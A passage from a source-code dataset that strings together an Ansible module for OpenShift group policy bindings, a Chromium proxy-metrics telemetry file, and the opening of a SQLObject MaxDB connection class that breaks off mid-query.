rval = {}
results = ''
err = None
if self.verbose:
print(' '.join(cmds))
try:
returncode, stdout, stderr = self._run(cmds, input_data)
except OSError as ex:
returncode, stdout, stderr = 1, '', 'Failed to execute {}: {}'.format(subprocess.list2cmdline(cmds), ex)
rval = {"returncode": returncode,
"results": results,
"cmd": ' '.join(cmds)}
if returncode == 0:
if output:
if output_type == 'json':
try:
rval['results'] = json.loads(stdout)
except ValueError as err:
if "No JSON object could be decoded" in err.args:
err = err.args
elif output_type == 'raw':
rval['results'] = stdout
if self.verbose:
print("STDOUT: {0}".format(stdout))
print("STDERR: {0}".format(stderr))
if err:
rval.update({"err": err,
"stderr": stderr,
"stdout": stdout,
"cmd": cmds})
else:
rval.update({"stderr": stderr,
"stdout": stdout,
"results": {}})
return rval
class Utils(object):
''' utilities for openshiftcli modules '''
@staticmethod
def _write(filename, contents):
''' Actually write the file contents to disk. This helps with mocking. '''
with open(filename, 'w') as sfd:
sfd.write(contents)
@staticmethod
def create_tmp_file_from_contents(rname, data, ftype='yaml'):
''' create a file in tmp with name and contents'''
tmp = Utils.create_tmpfile(prefix=rname)
if ftype == 'yaml':
# AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
# pylint: disable=no-member
if hasattr(yaml, 'RoundTripDumper'):
Utils._write(tmp, yaml.dump(data, Dumper=yaml.RoundTripDumper))
else:
Utils._write(tmp, yaml.safe_dump(data, default_flow_style=False))
elif ftype == 'json':
Utils._write(tmp, json.dumps(data))
else:
Utils._write(tmp, data)
# Register cleanup when module is done
atexit.register(Utils.cleanup, [tmp])
return tmp
@staticmethod
def create_tmpfile_copy(inc_file):
'''create a temporary copy of a file'''
tmpfile = Utils.create_tmpfile('lib_openshift-')
Utils._write(tmpfile, open(inc_file).read())
# Cleanup the tmpfile
atexit.register(Utils.cleanup, [tmpfile])
return tmpfile
@staticmethod
def create_tmpfile(prefix='tmp'):
''' Generates and returns a temporary file name '''
with tempfile.NamedTemporaryFile(prefix=prefix, delete=False) as tmp:
return tmp.name
@staticmethod
def create_tmp_files_from_contents(content, content_type=None):
'''Turn an array of dict: filename, content into a files array'''
if not isinstance(content, list):
content = [content]
files = []
for item in content:
path = Utils.create_tmp_file_from_contents(item['path'] + '-',
item['data'],
ftype=content_type)
files.append({'name': os.path.basename(item['path']),
'path': path})
return files
@staticmethod
def cleanup(files):
'''Clean up on exit '''
for sfile in files:
if os.path.exists(sfile):
if os.path.isdir(sfile):
shutil.rmtree(sfile)
elif os.path.isfile(sfile):
os.remove(sfile)
@staticmethod
def exists(results, _name):
''' Check to see if the results include the name '''
if not results:
return False
if Utils.find_result(results, _name):
return True
return False
@staticmethod
def find_result(results, _name):
''' Find the specified result by name'''
rval = None
for result in results:
if 'metadata' in result and result['metadata']['name'] == _name:
rval = result
break
return rval
@staticmethod
def get_resource_file(sfile, sfile_type='yaml'):
''' return the service file '''
contents = None
with open(sfile) as sfd:
contents = sfd.read()
if sfile_type == 'yaml':
# AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
# pylint: disable=no-member
if hasattr(yaml, 'RoundTripLoader'):
contents = yaml.load(contents, yaml.RoundTripLoader)
else:
contents = yaml.safe_load(contents)
elif sfile_type == 'json':
contents = json.loads(contents)
return contents
@staticmethod
def filter_versions(stdout):
''' filter the oc version output '''
version_dict = {}
version_search = ['oc', 'openshift', 'kubernetes']
for line in stdout.strip().split('\n'):
for term in version_search:
if not line:
continue
if line.startswith(term):
version_dict[term] = line.split()[-1]
# horrible hack to get openshift version in Openshift 3.2
# By default "oc version in 3.2 does not return an "openshift" version
if "openshift" not in version_dict:
version_dict["openshift"] = version_dict["oc"]
return version_dict
@staticmethod
def add_custom_versions(versions):
''' create custom versions strings '''
versions_dict = {}
for tech, version in versions.items():
# clean up "-" from version
if "-" in version:
version = version.split("-")[0]
if version.startswith('v'):
versions_dict[tech + '_numeric'] = version[1:].split('+')[0]
# "v3.3.0.33" is what we have, we want "3.3"
versions_dict[tech + '_short'] = version[1:4]
return versions_dict
@staticmethod
def openshift_installed():
''' check if openshift is installed '''
import yum
yum_base = yum.YumBase()
if yum_base.rpmdb.searchNevra(name='atomic-openshift'):
return True
return False
# Disabling too-many-branches. This is a yaml dictionary comparison function
# pylint: disable=too-many-branches,too-many-return-statements,too-many-statements
@staticmethod
def check_def_equal(user_def, result_def, skip_keys=None, debug=False):
''' Given a user defined definition, compare it with the results given back by our query. '''
# Currently these values are autogenerated and we do not need to check them
skip = ['metadata', 'status']
if skip_keys:
skip.extend(skip_keys)
for key, value in result_def.items():
if key in skip:
continue
# Both are lists
if isinstance(value, list):
if key not in user_def:
if debug:
print('User data does not have key [%s]' % key)
print('User data: %s' % user_def)
return False
if not isinstance(user_def[key], list):
if debug:
print('user_def[key] is not a list key=[%s] user_def[key]=%s' % (key, user_def[key]))
return False
if len(user_def[key]) != len(value):
if debug:
print("List lengths are not equal.")
print("key=[%s]: user_def[%s] != value[%s]" % (key, len(user_def[key]), len(value)))
print("user_def: %s" % user_def[key])
print("value: %s" % value)
return False
for values in zip(user_def[key], value):
if isinstance(values[0], dict) and isinstance(values[1], dict):
if debug:
print('sending list - list')
print(type(values[0]))
print(type(values[1]))
result = Utils.check_def_equal(values[0], values[1], skip_keys=skip_keys, debug=debug)
if not result:
print('list compare returned false')
return False
elif value != user_def[key]:
if debug:
print('value should be identical')
print(user_def[key])
print(value)
return False
# recurse on a dictionary
elif isinstance(value, dict):
if key not in user_def:
if debug:
print("user_def does not have key [%s]" % key)
return False
if not isinstance(user_def[key], dict):
if debug:
print("dict returned false: not instance of dict")
return False
# before passing ensure keys match
api_values = set(value.keys()) - set(skip)
user_values = set(user_def[key].keys()) - set(skip)
if api_values != user_values:
if debug:
print("keys are not equal in dict")
print(user_values)
print(api_values)
return False
result = Utils.check_def_equal(user_def[key], value, skip_keys=skip_keys, debug=debug)
if not result:
if debug:
print("dict returned false")
print(result)
return False
# Verify each key, value pair is the same
else:
if key not in user_def or value != user_def[key]:
if debug:
print("value not equal; user_def does not have key")
print(key)
print(value)
if key in user_def:
print(user_def[key])
return False
if debug:
print('returning true')
return True
class OpenShiftCLIConfig(object):
'''Generic Config'''
def __init__(self, rname, namespace, kubeconfig, options):
self.kubeconfig = kubeconfig
self.name = rname
self.namespace = namespace
self._options = options
@property
def config_options(self):
''' return config options '''
return self._options
def to_option_list(self):
'''return all options as a string'''
return self.stringify()
def stringify(self):
''' return the options hash as cli params in a string '''
rval = []
for key, data in self.config_options.items():
if data['include'] \
and (data['value'] or isinstance(data['value'], int)):
rval.append('--%s=%s' % (key.replace('_', '-'), data['value']))
return rval
# -*- -*- -*- End included fragment: lib/base.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/rolebinding.py -*- -*- -*-
# pylint: disable=too-many-instance-attributes
class RoleBindingConfig(object):
''' Handle rolebinding config '''
# pylint: disable=too-many-arguments
def __init__(self,
name,
namespace,
kubeconfig,
group_names=None,
role_ref=None,
subjects=None,
usernames=None):
''' constructor for handling rolebinding options '''
self.kubeconfig = kubeconfig
self.name = name
self.namespace = namespace
self.group_names = group_names
self.role_ref = role_ref
self.subjects = subjects
self.usernames = usernames
self.data = {}
self.create_dict()
def create_dict(self):
''' create a default rolebinding as a dict '''
self.data['apiVersion'] = 'v1'
self.data['kind'] = 'RoleBinding'
self.data['groupNames'] = self.group_names
self.data['metadata']['name'] = self.name
self.data['metadata']['namespace'] = self.namespace
self.data['roleRef'] = self.role_ref
self.data['subjects'] = self.subjects
self.data['userNames'] = self.usernames
# pylint: disable=too-many-instance-attributes,too-many-public-methods
class RoleBinding(Yedit):
''' Class to model a rolebinding openshift object'''
group_names_path = "groupNames"
role_ref_path = "roleRef"
subjects_path = "subjects"
user_names_path = "userNames"
kind = 'RoleBinding'
def __init__(self, content):
'''RoleBinding constructor'''
super(RoleBinding, self).__init__(content=content)
self._subjects = None
self._role_ref = None
self._group_names = None
self._user_names = None
@property
def subjects(self):
''' subjects property '''
if self._subjects is None:
self._subjects = self.get_subjects()
return self._subjects
@subjects.setter
def subjects(self, data):
''' subjects property setter'''
self._subjects = data
@property
def role_ref(self):
''' role_ref property '''
if self._role_ref is None:
self._role_ref = self.get_role_ref()
return self._role_ref
@role_ref.setter
def role_ref(self, data):
''' role_ref property setter'''
self._role_ref = data
@property
def group_names(self):
''' group_names property '''
if self._group_names is None:
self._group_names = self.get_group_names()
return self._group_names
@group_names.setter
def group_names(self, data):
''' group_names property setter'''
self._group_names = data
@property
def user_names(self):
''' user_names property '''
if self._user_names is None:
self._user_names = self.get_user_names()
return self._user_names
@user_names.setter
def user_names(self, data):
''' user_names property setter'''
self._user_names = data
def get_group_names(self):
''' return groupNames '''
return self.get(RoleBinding.group_names_path) or []
def get_user_names(self):
''' return usernames '''
return self.get(RoleBinding.user_names_path) or []
def get_role_ref(self):
''' return role_ref '''
return self.get(RoleBinding.role_ref_path) or {}
def get_subjects(self):
''' return subjects '''
return self.get(RoleBinding.subjects_path) or []
#### ADD #####
def add_subject(self, inc_subject):
''' add a subject '''
if self.subjects:
# pylint: disable=no-member
self.subjects.append(inc_subject)
else:
self.put(RoleBinding.subjects_path, [inc_subject])
return True
def add_role_ref(self, inc_role_ref):
''' add a role_ref '''
if not self.role_ref:
self.put(RoleBinding.role_ref_path, {"name": inc_role_ref})
return True
return False
def add_group_names(self, inc_group_names):
''' add a group_names '''
if self.group_names:
# pylint: disable=no-member
self.group_names.append(inc_group_names)
else:
self.put(RoleBinding.group_names_path, [inc_group_names])
return True
def add_user_name(self, inc_user_name):
''' add a username '''
if self.user_names:
# pylint: disable=no-member
self.user_names.append(inc_user_name)
else:
self.put(RoleBinding.user_names_path, [inc_user_name])
return True
#### /ADD #####
#### Remove #####
def remove_subject(self, inc_subject):
''' remove a subject '''
try:
# pylint: disable=no-member
self.subjects.remove(inc_subject)
except ValueError as _:
return False
return True
def remove_role_ref(self, inc_role_ref):
''' remove a role_ref '''
if self.role_ref and self.role_ref['name'] == inc_role_ref:
del self.role_ref['name']
return True
return False
def remove_group_name(self, inc_group_name):
''' remove a groupname '''
try:
# pylint: disable=no-member
self.group_names.remove(inc_group_name)
except ValueError as _:
return False
return True
def remove_user_name(self, inc_user_name):
''' remove a username '''
try:
# pylint: disable=no-member
self.user_names.remove(inc_user_name)
except ValueError as _:
return False
return True
#### /REMOVE #####
#### UPDATE #####
def update_subject(self, inc_subject):
''' update a subject '''
try:
# pylint: disable=no-member
index = self.subjects.index(inc_subject)
except ValueError as _:
return self.add_subject(inc_subject)
self.subjects[index] = inc_subject
return True
def update_group_name(self, inc_group_name):
''' update a groupname '''
try:
# pylint: disable=no-member
index = self.group_names.index(inc_group_name)
except ValueError as _:
return self.add_group_names(inc_group_name)
self.group_names[index] = inc_group_name
return True
def update_user_name(self, inc_user_name):
''' update a username '''
try:
# pylint: disable=no-member
index = self.user_names.index(inc_user_name)
except ValueError as _:
return self.add_user_name(inc_user_name)
self.user_names[index] = inc_user_name
return True
def update_role_ref(self, inc_role_ref):
''' update a role_ref '''
self.role_ref['name'] = inc_role_ref
return True
#### /UPDATE #####
#### FIND ####
def find_subject(self, inc_subject):
''' find a subject '''
index = None
try:
# pylint: disable=no-member
index = self.subjects.index(inc_subject)
except ValueError as _:
return index
return index
def find_group_name(self, inc_group_name):
''' find a group_name '''
index = None
try:
# pylint: disable=no-member
index = self.group_names.index(inc_group_name)
except ValueError as _:
return index
return index
def find_user_name(self, inc_user_name):
''' find a user_name '''
index = None
try:
# pylint: disable=no-member
index = self.user_names.index(inc_user_name)
except ValueError as _:
return index
return index
def find_role_ref(self, inc_role_ref):
''' find a user_name '''
if self.role_ref and self.role_ref['name'] == inc_role_ref['name']:
return self.role_ref
return None
# -*- -*- -*- End included fragment: lib/rolebinding.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/scc.py -*- -*- -*-
# pylint: disable=too-many-instance-attributes
class SecurityContextConstraintsConfig(object):
''' Handle scc options '''
# pylint: disable=too-many-arguments
def __init__(self,
sname,
kubeconfig,
options=None,
fs_group='MustRunAs',
default_add_capabilities=None,
groups=None,
priority=None,
required_drop_capabilities=None,
run_as_user='MustRunAsRange',
se_linux_context='MustRunAs',
supplemental_groups='RunAsAny',
users=None,
annotations=None):
''' constructor for handling scc options '''
self.kubeconfig = kubeconfig
self.name = sname
self.options = options
self.fs_group = fs_group
self.default_add_capabilities = default_add_capabilities
self.groups = groups
self.priority = priority
self.required_drop_capabilities = required_drop_capabilities
self.run_as_user = run_as_user
self.se_linux_context = se_linux_context
self.supplemental_groups = supplemental_groups
self.users = users
self.annotations = annotations
self.data = {}
self.create_dict()
def create_dict(self):
''' assign the correct properties for a scc dict '''
# allow options
if self.options:
for key, value in self.options.items():
self.data[key] = value
else:
self.data['allowHostDirVolumePlugin'] = False
self.data['allowHostIPC'] = False
self.data['allowHostNetwork'] = False
self.data['allowHostPID'] = False
self.data['allowHostPorts'] = False
self.data['allowPrivilegedContainer'] = False
self.data['allowedCapabilities'] = None
# version
self.data['apiVersion'] = 'v1'
# kind
self.data['kind'] = 'SecurityContextConstraints'
# defaultAddCapabilities
self.data['defaultAddCapabilities'] = self.default_add_capabilities
# fsGroup
self.data['fsGroup']['type'] = self.fs_group
# groups
self.data['groups'] = []
if self.groups:
self.data['groups'] = self.groups
# metadata
self.data['metadata'] = {}
self.data['metadata']['name'] = self.name
if self.annotations:
for key, value in self.annotations.items():
self.data['metadata'][key] = value
# priority
self.data['priority'] = self.priority
# requiredDropCapabilities
self.data['requiredDropCapabilities'] = self.required_drop_capabilities
# runAsUser
self.data['runAsUser'] = {'type': self.run_as_user}
# seLinuxContext
self.data['seLinuxContext'] = {'type': self.se_linux_context}
# supplementalGroups
self.data['supplementalGroups'] = {'type': self.supplemental_groups}
# users
self.data['users'] = []
if self.users:
self.data['users'] = self.users
# pylint: disable=too-many-instance-attributes,too-many-public-methods,no-member
class SecurityContextConstraints(Yedit):
''' Class to wrap the oc command line tools '''
default_add_capabilities_path = "defaultAddCapabilities"
fs_group_path = "fsGroup"
groups_path = "groups"
priority_path = "priority"
required_drop_capabilities_path = "requiredDropCapabilities"
run_as_user_path = "runAsUser"
se_linux_context_path = "seLinuxContext"
supplemental_groups_path = "supplementalGroups"
users_path = "users"
kind = 'SecurityContextConstraints'
def __init__(self, content):
'''SecurityContextConstraints constructor'''
super(SecurityContextConstraints, self).__init__(content=content)
self._users = None
self._groups = None
@property
def users(self):
''' users property getter '''
if self._users is None:
self._users = self.get_users()
return self._users
@property
def groups(self):
''' groups property getter '''
if self._groups is None:
self._groups = self.get_groups()
return self._groups
@users.setter
def users(self, data):
''' users property setter'''
self._users = data
@groups.setter
def groups(self, data):
''' groups property setter'''
self._groups = data
def get_users(self):
'''get scc users'''
return self.get(SecurityContextConstraints.users_path) or []
def get_groups(self):
'''get scc groups'''
return self.get(SecurityContextConstraints.groups_path) or []
def add_user(self, inc_user):
''' add a user '''
if self.users:
self.users.append(inc_user)
else:
self.put(SecurityContextConstraints.users_path, [inc_user])
return True
def add_group(self, inc_group):
''' add a group '''
if self.groups:
self.groups.append(inc_group)
else:
self.put(SecurityContextConstraints.groups_path, [inc_group])
return True
def remove_user(self, inc_user):
''' remove a user '''
try:
self.users.remove(inc_user)
except ValueError as _:
return False
return True
def remove_group(self, inc_group):
''' remove a group '''
try:
self.groups.remove(inc_group)
except ValueError as _:
return False
return True
def update_user(self, inc_user):
''' update a user '''
try:
index = self.users.index(inc_user)
except ValueError as _:
return self.add_user(inc_user)
self.users[index] = inc_user
return True
def update_group(self, inc_group):
''' update a group '''
try:
index = self.groups.index(inc_group)
except ValueError as _:
return self.add_group(inc_group)
self.groups[index] = inc_group
return True
def find_user(self, inc_user):
''' find a user '''
index = None
try:
index = self.users.index(inc_user)
except ValueError as _:
return index
return index
def find_group(self, inc_group):
''' find a group '''
index = None
try:
index = self.groups.index(inc_group)
except ValueError as _:
return index
return index
# -*- -*- -*- End included fragment: lib/scc.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: class/oc_adm_policy_group.py -*- -*- -*-
class PolicyGroupException(Exception):
''' PolicyGroup exception'''
pass
class PolicyGroupConfig(OpenShiftCLIConfig):
''' PolicyGroupConfig is a DTO for group related policy. '''
def __init__(self, namespace, kubeconfig, policy_options):
super(PolicyGroupConfig, self).__init__(policy_options['name']['value'],
namespace, kubeconfig, policy_options)
self.kind = self.get_kind()
self.namespace = namespace
def get_kind(self):
''' return the kind we are working with '''
if self.config_options['resource_kind']['value'] == 'role':
return 'rolebinding'
elif self.config_options['resource_kind']['value'] == 'cluster-role':
return 'clusterrolebinding'
elif self.config_options['resource_kind']['value'] == 'scc':
return 'scc'
return None
# pylint: disable=too-many-return-statements
class PolicyGroup(OpenShiftCLI):
''' Class to handle attaching policies to users '''
def __init__(self,
config,
verbose=False):
''' Constructor for PolicyGroup '''
super(PolicyGroup, self).__init__(config.namespace, config.kubeconfig, verbose)
self.config = config
self.verbose = verbose
self._rolebinding = None
self._scc = None
@property
def role_binding(self):
''' role_binding getter '''
return self._rolebinding
@role_binding.setter
def role_binding(self, binding):
''' role_binding setter '''
self._rolebinding = binding
@property
def security_context_constraint(self):
''' security_context_constraint getter '''
return self._scc
@security_context_constraint.setter
def security_context_constraint(self, scc):
''' security_context_constraint setter '''
self._scc = scc
def get(self):
'''fetch the desired kind'''
resource_name = self.config.config_options['name']['value']
if resource_name == 'cluster-reader':
resource_name += 's'
# oc adm policy add-... creates policy bindings with the name
# "[resource_name]-binding", however some bindings in the system
# simply use "[resource_name]". So try both.
results = self._get(self.config.kind, resource_name)
if results['returncode'] == 0:
return results
# Now try -binding naming convention
return self._get(self.config.kind, resource_name + "-binding")
def exists_role_binding(self):
''' return whether role_binding exists '''
results = self.get()
if results['returncode'] == 0:
self.role_binding = RoleBinding(results['results'][0])
if self.role_binding.find_group_name(self.config.config_options['group']['value']) != None:
return True
return False
elif self.config.config_options['name']['value'] in results['stderr'] and '" not found' in results['stderr']:
return False
return results
def exists_scc(self):
''' return whether scc exists '''
results = self.get()
if results['returncode'] == 0:
self.security_context_constraint = SecurityContextConstraints(results['results'][0])
if self.security_context_constraint.find_group(self.config.config_options['group']['value']) != None:
return True
return False
return results
def exists(self):
'''does the object exist?'''
if self.config.config_options['resource_kind']['value'] == 'cluster-role':
return self.exists_role_binding()
elif self.config.config_options['resource_kind']['value'] == 'role':
return self.exists_role_binding()
elif self.config.config_options['resource_kind']['value'] == 'scc':
return self.exists_scc()
return False
def perform(self):
'''perform action on resource'''
cmd = ['policy',
self.config.config_options['action']['value'],
self.config.config_options['name']['value'],
self.config.config_options['group']['value']]
return self.openshift_cmd(cmd, oadm=True)
@staticmethod
def run_ansible(params, check_mode):
'''run the idempotent ansible code'''
state = params['state']
action = None
if state == 'present':
action = 'add-' + params['resource_kind'] + '-to-group'
else:
action = 'remove-' + params['resource_kind'] + '-from-group'
nconfig = PolicyGroupConfig(params['namespace'],
params['kubeconfig'],
{'action': {'value': action, 'include': False},
'group': {'value': params['group'], 'include': False},
'resource_kind': {'value': params['resource_kind'], 'include': False},
'name': {'value': params['resource_name'], 'include': False},
})
policygroup = PolicyGroup(nconfig, params['debug'])
# Run the oc adm policy group related command
########
# Delete
########
if state == 'absent':
if not policygroup.exists():
return {'changed': False, 'state': 'absent'}
if check_mode:
return {'changed': False, 'msg': 'CHECK_MODE: would have performed a delete.'}
api_rval = policygroup.perform()
if api_rval['returncode'] != 0:
return {'msg': api_rval}
return {'changed': True, 'results' : api_rval, state:'absent'}
if state == 'present':
########
# Create
########
results = policygroup.exists()
if isinstance(results, dict) and 'returncode' in results and results['returncode'] != 0:
return {'msg': results}
if not results:
if check_mode:
return {'changed': False, 'msg': 'CHECK_MODE: would have performed a create.'}
api_rval = policygroup.perform()
if api_rval['returncode'] != 0:
return {'msg': api_rval}
return {'changed': True, 'results': api_rval, state: 'present'}
return {'changed': False, state: 'present'}
return {'failed': True, 'changed': False, 'results': 'Unknown state passed. %s' % state, state: 'unknown'}
# -*- -*- -*- End included fragment: class/oc_adm_policy_group.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: ansible/oc_adm_policy_group.py -*- -*- -*-
def main():
'''
ansible oc adm module for group policy
'''
module = AnsibleModule(
argument_spec=dict(
state=dict(default='present', type='str',
choices=['present', 'absent']),
debug=dict(default=False, type='bool'),
resource_name=dict(required=True, type='str'),
namespace=dict(default='default', type='str'),
kubeconfig=dict(default='/etc/origin/master/admin.kubeconfig', type='str'),
group=dict(required=True, type='str'),
resource_kind=dict(required=True, choices=['role', 'cluster-role', 'scc'], type='str'),
),
supports_check_mode=True,
)
results = PolicyGroup.run_ansible(module.params, module.check_mode)
if 'failed' in results:
module.fail_json(**results)
module.exit_json(**results)
if __name__ == "__main__":
main()
# -*- -*- -*- End included fragment: ansible/oc_adm_policy_group.py -*- -*- -*-
| apache-2.0 | 6,297,112,232,320,834,000 | 31.602089 | 118 | 0.536076 | false |
CapOM/ChromiumGStreamerBackend | tools/chrome_proxy/common/chrome_proxy_metrics.py | 15 | 3854 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import time
from common import network_metrics
from telemetry.page import page_test
from telemetry.value import scalar
CHROME_PROXY_VIA_HEADER = 'Chrome-Compression-Proxy'
class ChromeProxyMetricException(page_test.MeasurementFailure):
pass
class ChromeProxyResponse(network_metrics.HTTPResponse):
""" Represents an HTTP response from a timeline event."""
def __init__(self, event):
super(ChromeProxyResponse, self).__init__(event)
def ShouldHaveChromeProxyViaHeader(self):
resp = self.response
# Ignore https and data url
if resp.url.startswith('https') or resp.url.startswith('data:'):
return False
# Ignore 304 Not Modified and cache hit.
if resp.status == 304 or resp.served_from_cache:
return False
# Ignore invalid responses that don't have any header. Log a warning.
if not resp.headers:
logging.warning('response for %s does not any have header '
'(refer=%s, status=%s)',
resp.url, resp.GetHeader('Referer'), resp.status)
return False
return True
def HasResponseHeader(self, key, value):
response_header = self.response.GetHeader(key)
if not response_header:
return False
values = [v.strip() for v in response_header.split(',')]
return any(v == value for v in values)
def HasRequestHeader(self, key, value):
if key not in self.response.request_headers:
return False
request_header = self.response.request_headers[key]
values = [v.strip() for v in request_header.split(',')]
return any(v == value for v in values)
def HasChromeProxyViaHeader(self):
via_header = self.response.GetHeader('Via')
if not via_header:
return False
vias = [v.strip(' ') for v in via_header.split(',')]
# The Via header is valid if it has a 4-character version prefix followed by
# the proxy name, for example, "1.1 Chrome-Compression-Proxy".
return any(v[4:] == CHROME_PROXY_VIA_HEADER for v in vias)
def HasExtraViaHeader(self, extra_header):
return self.HasResponseHeader('Via', extra_header)
def IsValidByViaHeader(self):
return (not self.ShouldHaveChromeProxyViaHeader() or
self.HasChromeProxyViaHeader())
def GetChromeProxyRequestHeaderValue(self, key):
"""Get a specific Chrome-Proxy request header value.
Returns:
The value for a specific Chrome-Proxy request header value for a
given key. Returns None if no such key is present.
"""
if 'Chrome-Proxy' not in self.response.request_headers:
return None
chrome_proxy_request_header = self.response.request_headers['Chrome-Proxy']
values = [v.strip() for v in chrome_proxy_request_header.split(',')]
for value in values:
kvp = value.split('=', 1)
if len(kvp) == 2 and kvp[0].strip() == key:
return kvp[1].strip()
return None
def GetChromeProxyClientType(self):
"""Get the client type directive from the Chrome-Proxy request header.
Returns:
The client type directive from the Chrome-Proxy request header for the
request that lead to this response. For example, if the request header
"Chrome-Proxy: c=android" is present, then this method would return
"android". Returns None if no client type directive is present.
"""
return self.GetChromeProxyRequestHeaderValue('c')
def HasChromeProxyLoFiRequest(self):
return self.HasRequestHeader('Chrome-Proxy', "q=low")
def HasChromeProxyLoFiResponse(self):
return self.HasResponseHeader('Chrome-Proxy', "q=low")
def HasChromeProxyPassThroughRequest(self):
return self.HasRequestHeader('Chrome-Proxy', "pass-through")
| bsd-3-clause | 1,142,881,576,152,614,400 | 35.018692 | 80 | 0.69616 | false |
clausqr/HTPC-Manager | libs/sqlobject/maxdb/maxdbconnection.py | 8 | 10919 | """
Contributed by Edigram SAS, Paris France Tel:01 44 77 94 00
Ahmed MOHAMED ALI <[email protected]> 27 April 2004
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
connection creation sample::
__connection__ = DBConnection.maxdbConnection(
host=hostname, database=dbname,
user=user_name, password=user_password, autoCommit=1, debug=1)
"""
from sqlobject.dbconnection import DBAPI
from sqlobject import col
class maxdbException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class LowerBoundOfSliceIsNotSupported(maxdbException):
def __init__(self, value):
maxdbException.__init__(self, '')
class IncorrectIDStyleError(maxdbException) :
def __init__(self,value):
maxdbException.__init__(
self,
'This primary key name is not in the expected style, '
'please rename the column to %r or switch to another style'
% value)
class StyleMismatchError(maxdbException):
def __init__(self, value):
maxdbException.__init__(
self,
'The name %r is only permitted for primary key, change the '
'column name or switch to another style' % value)
class PrimaryKeyNotFounded(maxdbException):
def __init__(self, value):
maxdbException.__init__(
self,
"No primary key was defined on table %r" % value)
SAPDBMAX_ID_LENGTH=32
class MaxdbConnection(DBAPI):
supportTransactions = True
dbName = 'maxdb'
schemes = [dbName]
def __init__ (self, host='', port=None, user=None, password=None,
database=None, autoCommit=1, sqlmode='internal',
isolation=None, timeout=None, **kw):
from sapdb import dbapi
self.module = dbapi
self.host = host
self.port = port
self.user = user
self.password = password
self.db = database
self.autoCommit = autoCommit
self.sqlmode = sqlmode
self.isolation = isolation
self.timeout = timeout
DBAPI.__init__(self, **kw)
@classmethod
def _connectionFromParams(cls, auth, password, host, port, path, args):
path = path.replace('/', os.path.sep)
return cls(host, port, user=auth, password=password,
database=path, **args)
def _getConfigParams(self,sqlmode,auto):
autocommit='off'
if auto:
autocommit='on'
opt = {}
opt["autocommit"] = autocommit
opt["sqlmode"] = sqlmode
if self.isolation:
opt["isolation"]=self.isolation
if self.timeout :
opt["timeout"]=self.timeout
return opt
def _setAutoCommit(self, conn, auto):
conn.close()
conn.__init__(self.user, self.password, self.db, self.host,
**self._getConfigParams(self.sqlmode, auto))
def createSequenceName(self,table):
"""
sequence name are builded with the concatenation of the table
name with '_SEQ' word we truncate the name of the
sequence_name because sapdb identifier cannot exceed 32
characters so that the name of the sequence does not exceed 32
characters
"""
return '%s_SEQ'%(table[:SAPDBMAX_ID_LENGTH -4])
def makeConnection(self):
conn = self.module.Connection(
self.user, self.password, self.db, self.host,
**self._getConfigParams(self.sqlmode, self.autoCommit))
return conn
def _queryInsertID(self, conn, soInstance, id, names, values):
table = soInstance.sqlmeta.table
idName = soInstance.sqlmeta.idName
c = conn.cursor()
if id is None:
c.execute('SELECT %s.NEXTVAL FROM DUAL' % (self.createSequenceName(table)))
id = c.fetchone()[0]
names = [idName] + names
values = [id] + values
q = self._insertSQL(table, names, values)
if self.debug:
self.printDebug(conn, q, 'QueryIns')
c.execute(q)
if self.debugOutput:
self.printDebug(conn, id, 'QueryIns', 'result')
return id
@classmethod
def sqlAddLimit(cls,query,limit):
sql = query
sql = sql.replace("SELECT","SELECT ROWNO, ")
if sql.find('WHERE') != -1:
sql = sql + ' AND ' + limit
else:
sql = sql + 'WHERE ' + limit
return sql
@classmethod
def _queryAddLimitOffset(cls, query, start, end):
if start:
raise LowerBoundOfSliceIsNotSupported
limit = ' ROWNO <= %d ' % (end)
return cls.sqlAddLimit(query,limit)
def createTable(self, soClass):
#we create the table in a transaction because the addition of the
#table and the sequence must be atomic
#i tried to use the transaction class but i get a recursion limit error
#t=self.transaction()
# t.query('CREATE TABLE %s (\n%s\n)' % \
# (soClass.sqlmeta.table, self.createColumns(soClass)))
#
# t.query("CREATE SEQUENCE %s" % self.createSequenceName(soClass.sqlmeta.table))
# t.commit()
#so use transaction when the problem will be solved
self.query('CREATE TABLE %s (\n%s\n)' % \
(soClass.sqlmeta.table, self.createColumns(soClass)))
self.query("CREATE SEQUENCE %s"
% self.createSequenceName(soClass.sqlmeta.table))
return []
def createReferenceConstraint(self, soClass, col):
return col.maxdbCreateReferenceConstraint()
def createColumn(self, soClass, col):
return col.maxdbCreateSQL()
def createIDColumn(self, soClass):
key_type = {int: "INT", str: "TEXT"}[soClass.sqlmeta.idType]
return '%s %s PRIMARY KEY' % (soClass.sqlmeta.idName, key_type)
def createIndexSQL(self, soClass, index):
return index.maxdbCreateIndexSQL(soClass)
def dropTable(self, tableName,cascade=False):
#we drop the table in a transaction because the removal of the
#table and the sequence must be atomic
#i tried to use the transaction class but i get a recursion limit error
# try:
# t=self.transaction()
# t.query("DROP TABLE %s" % tableName)
# t.query("DROP SEQUENCE %s" % self.createSequenceName(tableName))
# t.commit()
# except:
# t.rollback()
#so use transaction when the problem will be solved
self.query("DROP TABLE %s" % tableName)
self.query("DROP SEQUENCE %s" % self.createSequenceName(tableName))
def joinSQLType(self, join):
return 'INT NOT NULL'
def tableExists(self, tableName):
for (table,) in self.queryAll("SELECT OBJECT_NAME FROM ALL_OBJECTS WHERE OBJECT_TYPE='TABLE'"):
if table.lower() == tableName.lower():
return True
return False
def addColumn(self, tableName, column):
self.query('ALTER TABLE %s ADD %s' %
(tableName,
column.maxdbCreateSQL()))
def delColumn(self, sqlmeta, column):
self.query('ALTER TABLE %s DROP COLUMN %s' % (sqlmeta.table, column.dbName))
GET_COLUMNS = """
SELECT COLUMN_NAME, NULLABLE, DATA_DEFAULT, DATA_TYPE,
DATA_LENGTH, DATA_SCALE
FROM USER_TAB_COLUMNS WHERE TABLE_NAME=UPPER('%s')"""
GET_PK_AND_FK = """
SELECT constraint_cols.column_name, constraints.constraint_type,
refname,reftablename
